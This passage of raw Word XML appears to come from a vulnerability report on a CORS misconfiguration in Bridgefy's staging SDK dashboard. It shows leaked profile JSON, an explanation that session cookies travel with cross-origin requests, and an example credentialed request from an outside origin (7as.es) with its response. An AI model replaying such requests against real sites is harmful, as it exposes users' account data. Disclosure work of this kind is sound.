          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Orta"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"client"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe431936e"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"country"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"60d25aaed1fe3a324c1fbf28"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"n ame"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Mexico"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Bridgefy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyWebsite"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy.me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"industry"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Tech "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Engineering/Product"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"use"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Messaging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"useBridgefySDK"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"termsAccepted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"profileCompleted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"twoFactor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"planActive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>due</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>misconfiguration,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the user authentication cookie to be sent along CORS requests:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/bridgefy/dashboard/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: staging.sdk.bridgefy.services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bfSDKSession=[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://7as.es</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="6424" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sec-Fetch-Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cross-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sec-Fetch-Mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: cors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sec-Fetch-Dest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://7as.es/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Fri, 06 Jan 2023 13:55:27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
